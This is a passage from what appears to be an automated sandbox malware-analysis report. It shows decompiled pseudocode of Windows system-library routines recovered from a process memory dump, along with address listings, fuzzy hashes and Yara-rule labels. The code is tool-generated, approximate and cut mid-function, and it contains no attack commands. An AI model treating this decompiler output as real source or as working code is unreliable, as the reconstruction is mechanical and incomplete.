							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E018D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0195A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0195A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E018B2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E018AB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E018AFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E018B7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0194FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0195e547
0x0195e549
0x0195e54f
0x0195e553
0x0195e557
0x0195e55a
0x0195e55c
0x0195e55f
0x0195e561
0x0195e567
0x0195e56b
0x0195e7e2
0x00000000
0x0195e571
0x0195e575
0x0195e577
0x0195e57b
0x0195e57c
0x0195e57d
0x0195e57e
0x0195e57f
0x0195e588
0x0195e58f
0x0195e591
0x0195e592
0x0195e592
0x0195e596
0x0195e59e
0x0195e5a0
0x0195e5a6
0x0195e61d
0x0195e61d
0x0195e621
0x0195e623
0x0195e630
0x0195e630
0x0195e7e6
0x0195e7eb
0x0195e7ed
0x0195e7f4
0x0195e7fa
0x0195e7ff
0x0195e7ff
0x0195e80a
0x0195e812
0x0195e812
0x0195e5ab
0x0195e5b4
0x0195e5b9
0x0195e5be
0x0195e5c0
0x0195e5c2
0x0195e5c8
0x0195e5c9
0x0195e5cb
0x0195e5cc
0x0195e5d5
0x0195e5e4
0x0195e5f1
0x0195e5f8
0x0195e5f8
0x0195e5d5
0x0195e602
0x0195e616
0x0195e63d
0x0195e644
0x0195e64d
0x0195e652
0x0195e657
0x0195e659
0x0195e65b
0x0195e661
0x0195e662
0x0195e664
0x0195e665
0x0195e66e
0x0195e67d
0x0195e68a
0x0195e691
0x0195e691
0x0195e66e
0x0195e6b0
0x00000000
0x0195e6b6
0x0195e6bd
0x0195e6c7
0x0195e6d7
0x0195e6d9
0x0195e6db
0x0195e6de
0x0195e6e3
0x0195e6f3
0x0195e6fc
0x0195e700
0x0195e700
0x0195e704
0x0195e70a
0x0195e70a
0x0195e713
0x0195e716
0x0195e719
0x0195e720
0x0195e761
0x0195e76b
0x0195e774
0x0195e77a
0x0195e77a
0x0195e78a
0x0195e791
0x0195e799
0x0195e79b
0x0195e79f
0x0195e7aa
0x0195e7c0
0x0195e7ac
0x0195e7b2
0x0195e7b9
0x0195e7b9
0x0195e7c7
0x0195e806
0x00000000
0x0195e7c9
0x0195e7d1
0x0195e7d8
0x00000000
0x0195e7d8
0x00000000
0x00000000
0x0195e722
0x0195e72e
0x0195e748
0x0195e74c
0x0195e754
0x0195e756
0x0195e75c
0x0195e75c
0x00000000
0x0195e75c
0x0195e758
0x0195e758
0x00000000
0x0195e758
0x0195e750
0x00000000
0x00000000
0x0195e752
0x00000000
0x0195e752
0x0195e730
0x0195e735
0x0195e73d
0x0195e73f
0x00000000
0x00000000
0x0195e741
0x0195e741
0x00000000
0x0195e741
0x0195e739
0x00000000
0x00000000
0x0195e73b
0x00000000
0x0195e73b
0x0195e722
0x0195e720
0x0195e6b0
0x0195e618
0x00000000
0x0195e618

Strings

`, xrefs: 0195E5D7
`, xrefs: 0195E670

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 05dd41b8ed577af8b5584a9be9a998602f2c90e770a24d944b3154d97e6e957b
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 4B91AF712043429FE764CE29C840B1BBBE9AF84714F14892DFA99DB280E771EA04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 019151BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E019151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x19705f0);
				E018ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E019153CA(0);
						return E018ED130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E018DF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E018B3690(1, _t117, 0x1871810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E018DAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L018B4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E018DAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0191500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E018D9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x019151be
0x019151c3
0x019151c8
0x019151cd
0x019151d0
0x019151d3
0x019151d8
0x019151db
0x019151de
0x019151e0
0x019151e3
0x019151e6
0x019151e8
0x01915342
0x01915351
0x01915356
0x0191535a
0x01915360
0x01915363
0x01915366
0x01915369
0x01915369
0x0191536b
0x0191536b
0x01915370
0x019153a3
0x019153a4
0x019153a6
0x019153ab
0x019153ab
0x019153ae
0x019153ae
0x019153b5
0x019153bf
0x019153bf
0x01915375
0x01915396
0x019153a0
0x019153a0
0x00000000
0x01915396
0x01915377
0x01915379
0x0191537f
0x0191538c
0x01915390
0x00000000
0x01915390
0x019151ee
0x019151f1
0x01915301
0x01915310
0x01915315
0x01915318
0x0191531b
0x01915320
0x0191532e
0x01915331
0x00000000
0x01915331
0x01915328
0x01915329
0x00000000
0x01915329
0x019151fa
0x01915235
0x01915236
0x01915239
0x0191523f
0x01915240
0x01915241
0x01915242
0x01915246
0x01915247
0x0191524e
0x01915251
0x01915267
0x01915269
0x0191526e
0x0191527d
0x0191527e
0x01915281
0x01915282
0x01915287
0x01915288
0x0191528a
0x0191528f
0x01915294
0x00000000
0x00000000
0x0191529a
0x0191529c
0x0191529e
0x0191529e
0x019152a4
0x019152b0
0x00000000
0x00000000
0x019152ba
0x019152bc
0x019152bc
0x019152d4
0x019152d9
0x019152dc
0x019152e1
0x00000000
0x00000000
0x019152e7
0x019152f4
0x00000000
0x019152f4
0x01915270
0x00000000
0x01915270
0x019151fc
0x019151fd
0x01915202
0x01915203
0x01915205
0x0191520a
0x0191520f
0x00000000
0x00000000
0x0191521b
0x01915226
0x0191522b
0x0191521d
0x0191521d
0x01915222
0x01915222
0x0191522d
0x00000000

Strings

Legacy, xrefs: 01915226
UEFI, xrefs: 0191521D

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
Instruction ID: cb63c461c44a867cd0bd6994ccb18b0006c9f16bf93bd85cc6fb0ca09a0d456f
Opcode Fuzzy Hash: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
Instruction Fuzzy Hash: F1517E71E00609DFEB25DFA8C880AADBBF8FF89700F16442DE609EB255D7719A41CB10

Uniqueness

Uniqueness Score: -1.00%

Function 018BB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E018BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x198d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E018B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01968CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E018D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E018DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E018DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E018B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01968F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E018DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1988628; // 0x0
								_v68 = _t77;
								_t78 =  *0x198862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1988628; // 0x0
							_t116 =  *0x198862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x018bb94c
0x018bb956
0x018bb95c
0x018bb95e
0x018bb964
0x018bb969
0x018bb96d
0x018bb96d
0x018bb970
0x018bb974
0x018bb97a
0x018bbadf
0x018bbadf
0x018bbae2
0x018bbae4
0x018bbae6
0x018bbaf0
0x01902cb8
0x018bbaf6
0x018bbaf6
0x018bbaf6
0x018bbafd
0x018bbb1f
0x018bbb1f
0x018bbaff
0x018bbb00
0x018bbb00
0x018bbb03
0x018bbb03
0x018bbacb
0x018bbacf
0x018bbad0
0x018bbad1
0x018bbadc
0x018bbadc
0x018bb980
0x018bb980
0x018bb988
0x018bb98b
0x018bb98d
0x018bb990
0x018bb993
0x018bb999
0x018bb99b
0x018bb9a1
0x018bb9a5
0x018bb9aa
0x018bb9b0
0x018bb9bb
0x018bb9c0
0x018bb9c3
0x018bb9ca
0x018bb9cc
0x018bb9cf
0x018bb9d3
0x018bb9d7
0x018bba94
0x018bba94
0x018bba98
0x018bbaa3
0x01902ccb
0x018bbaa9
0x018bbaa9
0x018bbaa9
0x018bbab1
0x01902cd5
0x01902cdd
0x01902cdd
0x018bbabb
0x018bbabc
0x018bbac2
0x018bbac3
0x018bbac3
0x018bbac6
0x00000000
0x018bb9dd
0x018bb9dd
0x018bb9e7
0x018bb9e7
0x018bb9ec
0x018bb9ec
0x018bb9f1
0x018bb9f5
0x018bb9fa
0x018bba00
0x018bba0c
0x018bba10
0x018bba10
0x018bba12
0x018bba18
0x00000000
0x00000000
0x018bbb26
0x018bbb26
0x018bba1e
0x018bba1e
0x018bba23
0x018bba25
0x018bba2c
0x018bba30
0x018bba35
0x018bba35
0x018bba41
0x018bba46
0x018bba4c
0x018bba50
0x018bba54
0x018bba6a
0x018bba6e
0x018bba70
0x018bba74
0x018bba78
0x018bba7a
0x018bba7c
0x018bba8e
0x018bba90
0x018bba92
0x018bbb14
0x018bbb14
0x018bbb16
0x018bbb16
0x00000000
0x018bba7c
0x018bbb0a
0x018bbb0d
0x00000000
0x00000000
0x00000000
0x018bbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018BB9A5

Memory Dump Source

Source File: 00000003.00000002.713836121.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
Instruction ID: 8db232d556e0cebf4fde681842c3f093cdae240f07d6bca3b571462d14bf3075
Opcode Fuzzy Hash: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
Instruction Fuzzy Hash: A0515671A09341CFC721CF2CC4C092ABBE9BB88714F54896EEA95D7355D770EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0189B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0189B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x196f7a8);
				E018ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E018ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E018DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E018DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L018EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E018DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E018DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E018DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E018DA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0189b171
0x0189b171
0x0189b171
0x0189b171
0x0189b171
0x0189b176
0x0189b17b
0x0189b180
0x0189b186
0x0189b18f
0x0189b198
0x0189b1a4
0x0189b1aa
0x018f4802
0x018f4802
0x018f4805
0x018f480c
0x018f480e
0x0189b1d1
0x0189b1d3
0x0189b1de
0x0189b1de
0x018f4817
0x018f481e
0x018f4820
0x018f4822
0x018f4822
0x018f4824
0x018f4824
0x018f482a
0x00000000
0x00000000
0x018f4835
0x018f483a
0x018f483d
0x018f483f
0x018f4842
0x018f4842
0x018f4842
0x018f4846
0x018f484c
0x018f484e
0x018f4851
0x018f4851
0x018f4853
0x018f4854
0x018f4854
0x018f4858
0x018f485a
0x018f485a
0x018f485d
0x018f485f
0x018f4861
0x018f4861
0x018f4866
0x018f486b
0x018f486e
0x018f4871
0x018f4876
0x018f4876
0x018f4878
0x018f487b
0x018f4884
0x018f4884
0x00000000
0x018f487d
0x018f487d
0x018f4882
0x018f4889
0x018f4889
0x018f488f
0x018f4891
0x018f48e0
0x018f48e2
0x018f48e4
0x018f48e4
0x018f48e7
0x018f48e7
0x018f48ed
0x018f48f4
0x018f48f6
0x018f4951
0x018f4951
0x018f4953
0x018f4953
0x018f4956
0x018f4956
0x018f4958
0x018f4959
0x018f4959
0x018f495d
0x018f495d
0x018f495f
0x018f495f
0x018f4965
0x018f4969
0x018f49ba
0x018f49ba
0x018f49c1
0x018f49c5
0x018f49cc
0x018f49d4
0x018f49d7
0x018f49da
0x018f49e4
0x018f49e5
0x018f49f3
0x018f4a02
0x00000000
0x018f4a02
0x018f4972
0x018f4974
0x00000000
0x00000000
0x018f4976
0x018f4979
0x018f4982
0x018f4983
0x018f4984
0x018f498b
0x018f498d
0x018f4991
0x018f4993
0x018f4999
0x018f499d
0x018f49a2
0x018f49a2
0x018f49a2
0x018f4999
0x018f49ac
0x00000000
0x018f49b3
0x018f48f8
0x018f48fe
0x00000000
0x00000000
0x00000000
0x018f48fe
0x018f4895
0x018f489c
0x018f48ad
